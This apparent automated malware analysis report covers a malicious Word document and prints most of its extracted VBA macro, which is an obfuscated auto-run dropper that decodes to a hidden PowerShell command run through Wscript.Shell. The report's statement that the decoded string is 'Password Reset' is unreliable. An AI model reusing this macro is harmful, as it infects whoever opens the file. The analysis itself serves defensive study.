Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 e7240f2587996ee5…

MALICIOUS

Office (OOXML)

37.3 KB Created: 2021-07-25 18:49:00 UTC Authoring application: Microsoft Office Word 16.0000 First seen: 2026-06-04
MD5: b94a48ac09ce87f9c3085e7410365cdf SHA-1: 0f55c86191972abbd39610fe0827e398d5ad158f SHA-256: e7240f2587996ee55b3f2b478089c9896dda789bfd75b21dbd2f2e01848b80f7
110 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1059 Command and Scripting Interpreter T1566.001 Spearphishing Attachment

The sample is an OOXML document containing a VBA macro that executes upon opening. The macro decodes a series of numeric values into a string, which is then likely used to download and execute a secondary payload. The presence of a Document_Open macro and CreateObject calls are strong indicators of malicious intent. The decoded string is 'Password Reset'.

Heuristics 5

  • VBA project inside OOXML medium 3 related findings OOXML_VBA
    Document contains a VBA project — VBA macros present
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
        CreateObject(b).Run (c)
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Triggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it — it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
  • Document_Open macro low OLE_VBA_DOCOPEN
    Document_Open macro
    Matched line in script
    Private Sub Document_Open()
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2014/chartexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2015/9/8/chartexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2015/10/21/chartexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2016/5/9/chartexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2016/5/10/chartexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2016/5/11/chartexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2016/5/12/chartexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2016/5/13/chartexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2016/5/14/chartexIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/markup-compatibility/2006In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2016/inkIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2017/model3dIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/officeDocument/2006/relationshipsIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/officeDocument/2006/mathIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingDrawingIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawingIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/wordprocessingml/2006/mainIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordmlIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2012/wordmlIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2018/wordml/cexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2016/wordml/cidIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2018/wordmlIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2020/wordml/sdtdatahashIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2015/wordml/symexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingGroupIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingInkIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2006/wordmlIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingShapeIn document text (OOXML body / shared strings)

Extracted artifacts 2

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source from OOXML) 25717 bytes
SHA-256: 9cfe00d1f86114fa3ea46df970d120e46533d1ebb0fbc75198f4cbce7f5fe750
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_New()

End Sub

Private Sub Document_Open()

zzz

End Sub

Attribute VB_Name = "NewMacros"
Function ConvFactToStr(ByVal str As Integer) As String
    Dim ret As String
    ret = Chr(((str / 2) - 28))
    
    ConvFactToStr = ret
End Function

Function Factorial(ByVal str As String) As String
    Dim LArray() As String
    LArray = Split(str, ";")
    
    Dim finStr As String
    
    For Each element In LArray
        If IsNumeric(element) Then
            finStr = finStr & ConvFactToStr(CInt(element))
        End If
    Next element
    
    Factorial = finStr
End Function


Sub zzz()

    
    Dim b As String
    b = Factorial("230;286;254;284;266;280;288;148;222;264;258;272;272")


    Dim z1 As String
    z1 = "216;278;294;258;284;222;264;258;272;272;120;146;294;266;276;256;278;294;286;288;298;272;258;120;264;266;256;256;258;276;120;"
    Dim zt1 As String
    zt1 = "146;190;278;274;274;250;276;256;120;124;238;222;298;222;288;194;274;148;288;194;296;288;148;194;276;254;278;192;266;276;262;242;172;172;226;276;202;190;278;256;258;148;198;194;224;222;288;284;266;276;198;136;238;222;298;286;288;194;210;148;190;278;276;228;258;220;288;242;172;172;260;284;278;274;188;250;286;258;164;160;286;224;284;202;276;198;136;134;204;186;188;274;186;198;270;186;252;186;188;272;186;194;294;186;252;294;188;268;186;190;186;186;216;218;186;262;186;190;218;186;236;218;188;290;186;200;234;186;214;262;188;210;186;194;168;186;218;294;188;188;186;194;294;186;218;218;188;218;186;196;186;186;220;186;188;188;186;196;218;186;218;218;186;262;186;190;286;186;202;186;186;266;186;196;294;186;220;294;188;292;186;198;168;186;236;294;188;286;186;198;226;186;232;186;188;192;186;198;262;186;254;262;188;292;186;198;152;186;236;218;188;254;186;196;226;186;254;294;188;272;186;200;202;186;202;186;188;194;186;198;194;186;256;186;188;264;186;196;294;"
    Dim z12 As String
    z12 = "186;224;186;188;292;186;198;210;186;234;218;188;286;186;190;186;186;226;294;188;152;186;198;194;186;256;186;188;272;186;190;202;186;190;262;186;206;186;190;218;186;228;186;188;272;186;198;152;186;254;186;188;198;186;198;270;186;252;186;188;272;186;192;210;186;202;186;186;170;186;190;186;186;224;262;188;272;186;200;254;186;208;218;188;226;186;198;226;186;252;218;188;294;186;198;168;186;254;262;188;264;186;200;202;186;258;218;188;198;186;198;270;186;252;186;188;272;186;186;278;186;218;294;188;292;186;200;186;186;258;218;186;288;186;194;270;186;256;186;188;272;186;198;152;186;202;186;186;270;186;198;234;186;250;218;188;286;186;198;226;186;224;186;188;292;186;198;210;186;202;186;186;288;186;194;218;186;236;218;188;300;186;200;218;186;250;218;188;290;186;198;194;186;256;186;188;280;186;198;168;186;252;262;186;262;186;190;218;186;228;186;188;272;186;198;152;186;254;186;188;198;186;198;270;186;252;186;188;272;186;192;210;186;190;262;186;270;186;198;234;186;250;218;188;286;186;198;226;186;218;"
    Dim z13 As String
    z13 = "294;188;292;186;198;160;186;256;186;186;262;186;192;152;186;202;186;188;200;186;198;226;186;256;186;186;288;186;194;210;186;252;294;188;290;186;200;218;186;236;218;188;290;186;200;218;186;202;186;186;270;186;196;218;186;236;218;188;288;186;200;186;186;220;262;188;280;186;198;294;186;236;218;186;300;186;186;278;186;190;262;186;270;186;200;262;186;202;186;186;170;186;190;186;186;204;186;188;274;186;198;270;186;252;186;188;272;186;194;210;186;252;294;188;290;186;200;218;186;202;186;188;168;186;190;186;186;218;294;188;292;186;198;160;186;256;262;188;272;186;200;202;186;256;186;188;198;186;200;202;186;252;294;188;288;186;190;152;186;222;262;188;300;186;198;168;186;252;262;186;206;186;190;218;186;250;294;188;272;186;200;270;186;202;186;186;170;186;190;186;186;204;186;188;160;186;190;160;186;252;294;188;300;186;196;168;186;234;294;188;298;186;200;270;186;254;186;188;152;186;190;160;186;236;218;188;290;186;198;210;186;254;262;188;162;186;200;186;186;256;186;188;272;186;198;218;186;232;294;188;"
    Dim z14 As String
    z14 = "284;186;198;226;186;258;218;186;206;186;186;278;186;218;218;188;270;186;198;218;186;208;218;188;226;186;200;270;186;254;186;188;272;186;190;186;186;208;218;188;188;186;200;210;186;254;294;188;272;186;198;152;186;234;262;188;286;186;200;270;186;224;262;188;264;186;198;152;186;236;218;186;262;186;196;210;186;258;218;188;300;186;200;218;186;236;218;188;288;186;190;160;186;226;294;188;272;186;198;210;186;256;218;188;298;186;198;270;186;256;186;188;162;186;186;278;186;204;186;188;266;186;198;226;186;236;262;188;266;186;198;194;186;254;294;188;272;186;190;186;186;216;218;186;262;186;196;286;186;226;294;188;162;186;200;210;186;256;186;188;272;186;198;152;186;208;262;188;192;186;198;168;186;252;262;188;156;186;198;226;186;254;262;188;152;186;196;152;186;214;262;186;164;186;194;234;186;254;262;188;292;186;198;152;186;218;262;188;264;186;200;210;186;236;218;186;156;186;192;218;186;226;294;188;152;186;200;202;186;250;218;188;290;186;198;254;186;206;186;186;270;186;198;286;186;236;218;188;162;186;"
    Dim z15 As String
    z15 = "190;270;186;190;262;186;270;186;198;202;186;236;218;188;274;186;198;202;186;234;218;188;300;186;198;226;186;202;186;186;170;186;190;186;186;204;186;188;266;186;198;226;186;236;262;188;266;186;198;194;186;254;294;188;272;186;196;286;186;212;218;186;290;186;190;160;186;206;186;186;270;186;198;202;186;236;218;188;274;186;198;202;186;234;218;188;300;186;198;226;186;208;262;188;210;186;198;226;186;252;262;188;276;186;200;218;186;250;186;186;288;186;192;194;186;206;218;188;256;186;186;278;186;204;186;188;268;186;198;294;186;236;218;188;264;186;200;202;186;226;186;188;232;186;194;218;186;232;294;188;190;186;200;270;186;256;186;188;272;186;194;194;186;254;262;188;298;186;198;194;186;258;218;186;262;186;192;152;186;202;186;188;252;186;196;210;186;258;218;188;300;186;200;218;186;236;218;188;288;186;190;160;186;226;294;188;272;186;198;210;186;256;218;188;298;186;198;270;186;256;186;188;162;186;190;160;186;218;294;188;298;186;200;270;186;254;186;188;152;186;198;168;186;236;294;188;298;186;198;194;"
    Dim z16 As String
    z16 = "186;254;186;188;278;186;200;270;186;208;262;188;218;186;200;202;186;252;294;188;152;186;198;226;186;234;294;188;152;186;198;226;186;236;186;188;194;186;198;194;186;256;186;188;264;186;196;152;186;214;262;186;164;186;196;226;186;252;262;188;294;186;200;202;186;252;294;188;152;186;198;226;186;234;294;188;152;186;190;262;186;202;186;186;270;186;198;202;186;236;218;188;274;186;198;202;186;234;218;188;300;186;198;226;186;208;186;186;262;186;190;218;186;252;262;188;154;186;198;294;186;252;186;186;286;186;190;186;186;230;294;188;224;186;200;270;186;254;294;188;152;186;198;226;186;252;218;186;290;186;196;210;186;236;218;188;268;186;200;226;186;254;262;188;280;186;200;218;186;258;218;186;290;186;194;210;186;254;262;188;162;186;200;186;186;256;186;188;292;186;198;254;186;254;262;188;264;186;200;186;186;250;186;188;162;186;190;160;186;220;186;188;264;186;200;218;186;234;218;188;218;186;200;202;186;252;294;188;152;186;198;226;186;234;294;188;152;186;198;270;186;252;294;188;290;186;196;210;186;234;"
    Dim z17 As String
    z17 = "294;188;292;186;200;186;186;236;218;188;256;186;192;278;186;214;262;188;192;186;200;226;186;254;262;188;298;186;198;226;186;252;262;188;152;186;196;226;186;254;294;188;272;186;200;202;186;202;186;186;280;186;186;278;186;190;262;186;270;186;196;218;186;236;218;188;288;186;200;186;186;220;262;188;280;186;198;294;186;236;218;186;262;186;192;152;186;202;186;188;214;186;198;226;186;256;294;186;288;186;196;218;186;236;218;188;288;186;200;186;186;252;294;188;298;186;198;194;186;254;262;188;162;186;194;234;186;250;218;188;286;186;198;226;186;190;262;188;224;186;198;226;186;256;186;186;288;186;194;210;186;252;294;188;290;186;200;218;186;236;218;188;290;186;200;218;186;202;186;186;270;186;196;218;186;236;218;188;288;186;200;186;186;220;262;188;280;186;198;294;186;236;218;186;262;186;190;152;186;228;262;188;264;186;198;294;186;256;218;188;272;186;190;186;186;204;186;188;268;186;198;294;186;236;218;188;264;186;200;202;186;226;186;188;232;186;194;218;186;232;294;188;190;186;200;270;186;256;186;188;"
    Dim z18 As String
    z18 = "272;186;194;194;186;254;262;188;298;186;198;194;186;258;218;186;262;186;190;152;186;220;218;188;290;186;198;210;186;252;294;188;270;186;198;270;186;252;262;188;276;186;190;186;186;218;262;188;162;186;200;218;186;236;218;186;206;186;190;218;186;236;262;188;292;186;198;294;186;236;186;188;218;186;198;194;186;254;262;186;262;186;192;152;186;202;186;186;270;186;198;226;186;252;262;188;156;186;192;278;186;224;186;188;216;186;194;210;186;218;218;188;210;186;194;194;186;226;186;188;218;186;194;218;186;218;218;188;226;186;194;194;186;202;186;186;284;186;190;186;186;202;262;188;254;186;194;254;186;252;294;188;292;186;198;254;186;252;186;188;272;186;196;294;186;218;294;188;278;186;200;202;186;252;294;188;288;186;198;226;186;232;186;188;228;186;200;210;186;236;218;188;298;186;190;186;186;220;186;188;264;186;200;218;186;234;218;186;266;186;186;278;186;204;186;188;268;186;198;262;186;220;262;186;262;186;192;152;186;202;186;188;200;186;198;226;186;256;186;186;288;186;194;210;186;250;186;188;280;186;"
    Dim z19 As String
    z19 = "198;294;186;236;186;188;204;186;200;218;186;236;218;188;288;186;190;186;186;208;218;188;218;186;198;194;186;256;186;188;278;186;190;186;186;204;186;188;274;186;198;168;186;252;186;188;270;186;196;186;186;234;218;188;298;186;190;186;186;208;218;188;198;186;198;270;186;252;186;188;152;186;198;226;186;254;262;186;262;186;190;202;186;224;186;188;292;186;198;254;186;250;218;188;290;186;190;186;186;220;186;188;264;186;200;218;186;234;218;186;266;186;190;186;186;208;218;188;222;186;198;226;186;234;294;188;154;186;200;202;186;254;294;188;272;186;190;186;186;208;218;188;196;186;200;202;186;254;262;188;292;186;200;202;186;218;218;188;268;186;200;218;186;250;218;188;292;186;198;160;186;202;186;188;224;186;198;270;186;252;186;188;272;186;198;160;186;256;186;188;286;186;200;270;186;218;294;188;292;186;198;160;186;256;186;188;280;186;198;160;186;256;218;188;272;186;190;186;186;208;218;188;198;186;198;168;186;254;262;188;268;186;198;226;186;202;186;186;288;186;194;160;186;234;218;188;288;186;198;226;"
    Dim z111 As String
    z111 = "186;190;262;186;206;186;190;218;186;252;294;188;156;186;198;226;186;254;262;188;264;186;198;294;186;252;186;188;214;186;200;226;186;252;218;186;262;186;192;152;186;202;186;186;278;186;194;254;186;236;218;188;152;186;190;152;186;226;262;188;264;186;198;160;186;236;186;188;292;186;198;152;186;202;186;186;288;186;194;152;186;250;218;188;290;186;198;270;186;252;218;188;154;186;198;152;186;202;186;186;296;186;192;186;186;210;186;186;294;186;192;186;186;210;186;186;294;186;192;186;186;202;186;186;288;186;194;152;186;234;218;188;160;186;198;270;186;252;218;188;154;186;198;152;186;202;186;186;162;186;192;270;186;214;218;186;162;186;192;270;186;214;218;186;162;186;192;270;186;206;218;186;206;186;186;278;186;204;186;188;274;186;200;218;186;254;186;186;262;186;192;152;186;202;186;188;252;186;196;210;186;258;218;188;300;186;200;218;186;236;218;188;288;186;190;160;186;224;262;188;272;186;200;218;186;208;262;188;198;186;200;218;186;254;186;188;232;186;198;226;186;234;262;188;222;186;198;226;186;254;"
    Dim z112 As String
    z112 = "218;188;154;186;198;226;186;254;294;188;152;186;196;152;186;214;262;186;164;186;194;210;186;254;262;188;272;186;198;194;186;256;186;188;272;186;190;262;186;206;186;186;266;186;198;234;186;256;186;188;294;186;192;278;186;208;294;186;292;186;192;254;186;210;294;186;290;186;192;194;186;210;186;186;298;186;190;160;186;210;218;186;158;186;192;194;186;208;262;186;296;186;192;202;186;214;218;186;292;186;190;202;186;202;186;186;284;186;190;186;186;202;262;188;284;186;196;168;186;202;262;186;262;186;190;286;186;202;186;186;270;186;198;168;186;256;262;188;272;186;200;202;186;234;218;188;286;186;198;294;186;224;262;188;154;186;198;152;186;202;186;186;284;186;190;186;186;202;262;186;290;186;198;218;186;234;218;188;152;186;190;202;186;206;218;186;280;186;186;278;186;204;186;188;274;186;200;218;186;254;186;186;262;186;192;152;186;202;186;188;252;186;196;210;186;258;218;188;300;186;200;218;186;236;218;188;288;186;190;160;186;224;262;188;272;186;200;218;186;208;262;188;198;186;200;218;186;254;186;188;"
    Dim z113 As String
    z113 = "232;186;198;226;186;234;262;188;222;186;198;226;186;254;218;188;154;186;198;226;186;254;294;188;152;186;196;152;186;204;186;188;274;186;200;218;186;254;186;186;206;186;190;218;186;236;262;188;152;186;200;186;186;208;262;188;212;186;198;226;186;256;186;188;278;186;198;168;186;236;186;186;262;186;192;152;186;202;186;188;252;186;196;210;186;258;218;188;300;186;200;218;186;236;218;188;288;186;190;160;186;224;262;188;272;186;200;218;186;208;262;188;232;186;198;226;186;234;262;188;222;186;198;226;186;254;218;188;154;186;198;226;186;254;294;188;152;186;194;152;186;236;218;188;152;186;198;262;186;252;294;188;270;186;200;210;186;206;294;188;198;186;200;218;186;254;186;188;256;186;192;278;186;214;262;188;228;186;200;186;186;252;186;188;292;186;198;194;186;236;186;188;198;186;198;270;186;252;186;188;272;186;186;278;186;204;186;188;274;186;200;218;186;254;186;186;290;186;194;210;186;254;262;188;272;186;198;218;186;236;218;188;290;186;200;218;186;250;218;188;264;186;198;294;186;254;294;186;262;186;"
    Dim z114 As String
    z114 = "192;152;186;202;186;188;290;186;198;226;186;256;294;186;288;186;198;168;186;234;262;188;282;186;198;226;186;234;294;188;152;186;190;186;186;226;294;188;162;186;200;210;186;256;186;188;272;186;198;152;186;208;262;188;214;186;198;226;186;256;186;186;290;186;194;160;186;236;218;188;152;186;200;254;186;252;294;188;298;186;198;286;186;218;294;188;298;186;198;226;186;236;186;188;272;186;198;160;186;256;186;188;280;186;198;194;186;252;186;186;278;186;190;202;186;236;262;188;152;186;200;186;186;256;218;188;300;186;198;226;186;254;262;188;286;186;190;202;186;208;186;186;266;186;198;234;186;256;186;188;294;186;200;226;186;254;294;188;272;186;200;202;186;252;186;188;292;186;198;254;186;250;218;188;290;186;200;278;186;202;262;186;280;186;186;278;186;204;186;188;274;186;200;218;186;254;186;186;290;186;196;226;186;254;294;188;272;186;194;202;186;250;218;188;290;186;198;194;186;254;262;188;162;186;190;186;186;216;218;186;262;186;190;218;186;256;186;188;298;186;200;226;186;236;218;186;206;186;190;218;"
    Dim z115 As String
    z115 = "186;236;262;188;152;186;200;186;186;208;262;188;228;186;200;210;186;236;218;188;218;186;198;194;186;254;294;188;300;186;198;270;186;256;262;188;272;186;190;186;186;216;218;186;262;186;190;218;186;256;186;188;298;186;200;226;186;236;218;186;206;186;190;218;186;234;294;188;292;186;198;160;186;256;186;188;272;186;198;160;186;256;186;186;262;186;192;152;186;202;186;188;252;186;196;210;186;258;218;188;300;186;200;218;186;236;218;188;288;186;190;160;186;222;218;188;216;186;190;160;186;220;262;188;280;186;198;294;186;236;218;188;256;186;192;278;186;214;262;188;222;186;198;226;186;234;218;188;270;186;194;194;186;252;186;188;286;186;194;202;186;258;218;188;152;186;198;226;186;254;294;186;278;186;190;218;186;228;186;188;272;186;198;152;186;254;186;188;198;186;198;270;186;252;186;188;272;186;190;270;186;190;262;186;270;186;198;234;186;256;186;188;294;186;190;160;186;218;294;188;292;186;198;160;186;256;186;188;272;186;198;160;186;256;186;188;210;186;198;226;186;252;262;188;276;186;200;218;186;250;"
    Dim z116 As String
    z116 = "186;186;262;186;192;152;186;202;186;186;270;186;198;210;186;252;294;188;290;186;200;218;186;236;218;188;290;186;200;218;186;208;262;188;210;186;198;226;186;252;262;188;276;186;200;218;186;250;186;186;206;186;190;218;186;254;262;188;300;186;190;186;186;216;218;186;262;186;190;218;186;236;262;188;152;186;200;186;186;208;262;188;200;186;198;226;186;256;186;188;222;186;198;226;186;254;218;188;154;186;198;226;186;254;294;188;152;186;196;210;186;256;186;188;298;186;198;226;186;234;218;188;288;186;190;262;186;206;218;186;206;186;190;218;186;254;262;188;300;186;190;160;186;228;294;188;298;186;198;270;186;256;186;188;272;186;190;262;186;204;186;188;268;186;198;168;186;252;262;188;152;186;198;226;186;252;262;188;152;186;190;294;186;202;186;186;294;186;190;294;186;202;186;186;270;186;198;210;186;252;294;188;290;186;200;218;186;236;218;188;290;186;200;218;186;208;262;188;210;186;198;226;186;252;262;188;276;186;200;218;186;250;186;186;280;186;186;278;186;204;186;188;298;186;200;210;186;208;262;188;"
    Dim z117 As String
    z117 = "192;186;198;294;186;252;294;188;300;186;198;226;186;206;186;186;280;186;186;278;186;204;186;188;298;186;200;210;186;208;262;188;194;186;198;270;186;254;294;188;294;186;198;168;186;254;294;188;272;186;190;262;186;206;218;186;206;186;186;278;186;204;186;188;268;186;200;226;186;254;262;188;204;186;200;218;186;202;186;186;170;186;190;186;186;210;186;186;206;186;198;234;186;252;294;188;298;186;198;226;186;234;218;188;268;186;198;262;186;202;186;186;278;186;190;218;186;234;294;188;198;186;190;186;186;250;218;188;290;186;190;186;186;204;186;188;268;186;198;262;186;220;262;186;280;186;190;186;186;258;294;186;206;186;190;186;186;202;186;186;262;186;190;186;186;204;186;188;268;186;194;234;186;224;186;188;292;186;198;210;186;202;186;186;170;186;190;186;186;204;186;188;274;186;198;168;186;252;186;188;270;186;196;186;186;234;218;188;298;186;190;186;186;206;294;186;262;186;190;202;186;232;186;186;266;186;190;186;186;206;294;186;262;186;190;218;186;234;294;188;198;186;186;278;186;202;186;186;262;186;"
    Dim z118 As String
    z118 = "190;186;186;202;186;186;270;186;196;218;186;236;218;188;288;186;200;186;186;220;262;188;280;186;198;294;186;236;218;186;298;186;190;186;186;216;218;186;262;186;194;160;186;236;218;188;158;186;190;152;186;228;186;188;272;186;198;152;186;254;186;188;292;186;200;202;186;234;218;188;298;186;200;270;186;220;262;188;280;186;198;294;186;236;218;186;206;186;190;186;186;202;186;186;262;186;190;186;186;218;294;188;292;186;200;186;186;258;218;186;288;186;194;270;186;256;186;188;272;186;198;152;186;202;186;186;270;186;198;210;186;220;262;188;210;186;198;168;186;234;294;186;262;186;190;152;186;220;186;188;272;186;200;210;186;256;186;188;280;186;198;160;186;234;218;188;152;186;198;270;186;252;294;188;290;186;190;186;186;204;186;188;226;186;198;226;186;252;218;188;294;186;194;234;186;250;218;188;286;186;198;226;186;210;262;186;206;186;190;186;186;202;186;186;262;186;190;186;186;204;186;188;274;186;200;218;186;254;186;186;262;186;192;152;186;202;186;188;252;186;196;210;186;258;218;188;300;186;200;218;"
    Dim z119 As String
    z119 = "186;236;218;188;288;186;190;160;186;224;262;188;272;186;200;218;186;208;262;188;198;186;200;218;186;254;186;188;232;186;198;226;186;234;262;188;222;186;198;226;186;254;218;188;154;186;198;226;186;254;294;188;152;186;196;152;186;214;262;186;164;186;194;210;186;254;262;188;272;186;198;194;186;256;186;188;272;186;190;262;186;206;186;186;266;186;198;234;186;256;186;188;294;186;192;278;186;208;294;186;292;186;192;254;186;210;294;186;290;186;192;194;186;210;186;186;298;186;190;160;186;210;218;186;158;186;192;194;186;208;262;186;296;186;192;202;186;214;218;186;292;186;190;202;186;202;186;186;284;186;190;186;186;202;262;188;268;186;190;202;186;202;186;186;284;186;190;186;186;204;186;188;268;186;200;226;186;254;262;188;204;186;200;218;186;202;186;186;284;186;190;186;186;202;262;188;260;186;190;202;186;202;186;186;284;186;190;186;186;204;186;188;292;186;200;234;186;236;218;188;298;186;198;194;186;252;186;188;286;186;194;160;186;256;218;188;288;186;190;186;186;206;294;186;262;186;190;202;186;208;"
    Dim z120 As String
    z120 = "262;188;270;186;198;194;186;256;186;186;266;186;190;270;186;206;218;186;206;186;190;186;186;202;186;186;262;186;190;186;186;204;186;188;274;186;200;218;186;254;186;186;262;186;192;152;186;202;186;188;252;186;196;210;186;258;218;188;300;186;200;218;186;236;218;188;288;186;190;160;186;224;262;188;272;186;200;218;186;208;262;188;198;186;200;218;186;254;186;188;232;186;198;226;186;234;262;188;222;186;198;226;186;254;218;188;154;186;198;226;186;254;294;188;152;186;196;152;186;204;186;188;274;186;200;218;186;254;186;186;206;186;190;186;186;202;186;186;262;186;190;186;186;204;186;188;274;186;200;218;186;254;186;186;290;186;194;152;186;236;218;188;152;186;198;262;186;252;294;188;270;186;190;186;186;216;218;186;262;186;196;286;186;226;294;188;162;186;200;210;186;256;186;188;272;186;198;152;186;208;262;188;214;186;198;226;186;256;186;186;290;186;196;254;186;236;218;188;266;186;196;202;186;236;218;188;296;186;200;226;186;236;218;188;300;186;200;218;186;224;218;188;272;186;200;218;186;250;186;188;"
    Dim z121 As String
    z121 = "292;186;198;218;186;254;294;186;284;186;194;234;186;256;186;188;294;186;196;152;186;214;262;186;164;186;196;226;186;254;186;188;286;186;198;168;186;234;218;188;270;186;194;234;186;250;218;188;286;186;198;226;186;190;262;186;262;186;190;186;186;202;186;186;262;186;190;218;186;236;262;188;152;186;200;186;186;208;262;188;192;186;200;202;186;236;218;188;270;186;198;226;186;252;262;188;152;186;198;270;186;234;218;188;286;186;200;210;186;202;186;186;170;186;190;186;186;252;262;188;272;186;200;254;186;208;218;188;292;186;198;202;186;250;262;188;272;186;198;210;186;256;186;186;262;186;196;210;186;258;218;188;300;186;200;218;186;236;218;188;288;186;190;160;186;224;262;188;272;186;200;218;186;208;262;188;214;186;198;226;186;256;186;188;158;186;198;168;186;254;262;188;284;186;194;210;186;254;262;188;272;186;198;218;186;236;218;188;290;186;200;218;186;250;218;188;264;186;198;294;186;206;186;186;266;186;198;234;186;256;186;188;294;186;200;226;186;254;294;188;272;186;200;202;186;252;186;186;266;186;"
    Dim z122 As String
    z122 = "190;294;186;202;262;188;274;186;200;218;186;254;186;188;154;186;200;210;186;236;218;188;298;186;198;294;186;252;294;188;276;186;198;270;186;252;262;188;164;186;190;202;186;206;218;186;206;186;190;186;186;202;186;186;262;186;190;186;186;204;186;188;274;186;200;218;186;254;186;186;290;186;196;226;186;254;294;188;272;186;194;202;186;250;218;188;290;186;198;194;186;254;262;188;162;186;190;186;186;216;218;186;262;186;190;218;186;256;186;188;298;186;200;226;186;236;218;186;206;186;190;186;186;202;186;186;262;186;190;186;186;204;186;188;274;186;200;218;186;254;186;186;290;186;196;226;186;254;294;188;272;186;196;186;186;234;218;188;300;186;200;210;186;250;218;188;156;186;198;226;186;202;186;186;170;186;190;186;186;204;186;188;152;186;200;202;186;256;218;188;272;186;186;278;186;202;186;186;262;186;190;186;186;202;186;186;270;186;198;210;186;252;294;188;290;186;200;218;186;236;218;188;290;186;200;218;186;202;186;186;170;186;190;186;186;230;294;188;224;186;200;270;186;254;294;188;152;186;198;226;"
    Dim z123 As String
    z123 = "186;252;218;186;290;186;194;270;186;224;294;186;290;186;194;234;186;250;218;188;286;186;198;226;186;232;218;186;164;186;192;278;186;226;262;188;272;186;198;194;186;236;186;188;188;186;198;294;186;252;186;188;190;186;200;270;186;256;186;188;272;186;200;210;186;206;186;186;270;186;196;218;186;236;218;188;288;186;200;186;186;220;262;188;280;186;198;294;186;236;218;186;298;186;190;270;186;190;262;186;262;186;190;186;186;202;186;186;262;186;190;218;186;236;262;188;152;186;200;186;186;208;262;188;192;186;198;168;186;252;262;188;152;186;198;226;186;252;262;188;152;186;194;294;186;236;218;188;290;186;198;254;186;256;186;188;278;186;190;186;186;216;218;186;262;186;190;218;186;234;294;188;292;186;198;160;186;256;186;188;272;186;198;160;186;256;186;186;290;186;194;294;186;236;218;188;290;186;198;254;186;256;186;188;278;186;186;278;186;202;186;186;262;186;190;186;186;202;186;186;270;186;200;202;186;254;294;186;262;186;192;152;186;202;186;186;270;186;198;234;186;256;186;188;294;186;190;160;186;220;"
    Dim z124 As String
    z124 = "294;188;272;186;200;218;186;226;262;188;272;186;200;194;186;256;218;188;272;186;200;210;186;256;186;188;224;186;200;218;186;254;262;188;272;186;198;194;186;252;218;186;278;186;190;270;186;190;262;186;262;186;190;186;186;202;186;186;262;186;190;218;186;254;262;188;300;186;190;160;186;228;294;188;298;186;198;270;186;256;186;188;272;186;190;262;186;204;186;188;268;186;198;168;186;252;262;188;152;186;198;226;186;252;262;188;152;186;190;294;186;202;186;186;294;186;190;294;186;202;186;186;270;186;198;210;186;252;294;188;290;186;200;218;186;236;218;188;290;186;200;218;186;208;262;188;210;186;198;226;186;252;262;188;276;186;200;218;186;250;186;186;280;186;186;278;186;202;186;186;262;186;190;186;186;202;186;186;270;186;200;202;186;254;294;186;290;186;194;210;186;252;186;188;292;186;200;210;186;236;218;186;278;186;190;270;186;190;262;186;262;186;190;186;186;202;186;186;262;186;190;218;186;254;262;188;300;186;190;160;186;220;186;188;280;186;200;210;186;254;186;188;292;186;200;210;186;236;218;186;"
    Dim z125 As String
